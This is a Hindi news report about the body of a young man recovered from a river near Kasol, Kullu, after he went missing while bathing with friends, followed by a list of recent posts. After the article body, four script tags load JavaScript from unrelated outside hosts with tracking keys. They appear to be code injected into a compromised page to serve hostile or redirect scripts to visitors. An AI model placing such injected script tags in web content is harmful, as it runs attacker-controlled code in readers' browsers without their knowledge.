कुल्लूः कसोल के पास मोक्ष नदी में मिला युवक का शव

<p>पर्यटन नगरी मणिकर्ण के कसोल में मोक्ष नदी से एक युवक का शव बरामद हुआ है। जिसे पुलिस और रैस्क्यू दल ने नदी से बाहर निकाल लिया है और शव को पोस्टमार्टम के लिए शव गृह ले जाया जा रहा है। एसपी कुल्लू गौरव सिंह ने बताया कि मृत युवक की पहचान सुनील कुमार पुत्र श्याम लाल ढमार आनी जिला कुल्लू के रूप में हुई है। अब तक की छानबीन में पता चला है कि सुनील कुमार अपने दोस्तों टीटू, सन्नी और अजय के साथ 2 फरवरी को स्कूटी पर मणिकर्ण गए थे और इस दौरान वे सभी स्नान करने के लिए कसोल के पास एक प्राकृतिक स्त्रोत में नहाने के लिए गए थे जब नहाकर वे वापिस लौट रहे थे तो सुनील गायब था।</p>

<p>टीटू, सन्नी और अजय ने बताया कि उन्होंने सुनील को रात दो बजे तक ढूंढा लेकिन उसका कहीं कोई पता नहीं चला जिसके चलते उन्होंने रात को सुनील के भाई मयंक सिंह को भी इसकी सूचना दी थी। उसके बाद पुलिस को भी इसकी सूचना मिली थी और पुलिस सूचना मिलने के बाद गुम हुए सुनील की तलाश में निकली थी इस दौरान सुनील का शव कसोल के साथ बहती मोक्ष नदी से बरामद हुआ है। एसपी गौरव सिंह ने बताया कि मामले को हर पहलु से देखा जा रहा है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578049201572″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

बाहर से आने वाले ऐशगाह न बनाएं हिमाचल को: राज्यपाल

  Shimla: शिमला के संजौली मस्जिद विवाद के बाद हिमाचल प्रदेश में गरमाए सियासी माहौल…

4 hours ago

हिमाचल में चलेगा योगी मॉडल, हर भोजनालय पर पहचान पत्र लगाना अनिवार्य

  Shimla:योगी माडल को हिमाचल अपनाने जा रहा है। यूपी की तर्ज पर हर भोजनालय,…

5 hours ago

आपसी रंजिश में चली गोलियां, एक गंभीर, भड़के ग्रामीणों ने किरतपुर-नेरचौक फोरलेन किया जाम

  Bilaspur: उपमंडल श्री नयना देवी जी के बैहल में आपसी रंजिश के चलते हुए…

5 hours ago

ए. शैनामोल मंडी की नई मंडलायुक्त, संदीप कदम को शिमला की जिम्मेदारी

पांच आईएएस अधिकारियों के तबादला और नियुक्ति आदेश क्लिक करें और पढें पूरी सूची Shimla:…

9 hours ago

HP Board परीक्षाओं में 50% प्रश्न होंगे योग्यता आधारित, जानें नई व्यवस्था

  धर्मशाला। हिमाचल प्रदेश स्कूल शिक्षा बोर्ड परीक्षाओं के पैटर्न में बड़े बदलाव की तैयारी…

10 hours ago

Mandi: पति को कुंए में डूबा देख पत्‍नी ने भी लगाई छलांग, दोनों की दर्दनाक मौत

मंडी के रखोह के कलोह गांव की घटना मृतक वार्ड पंच और पत्‍नी थी आशा…

11 hours ago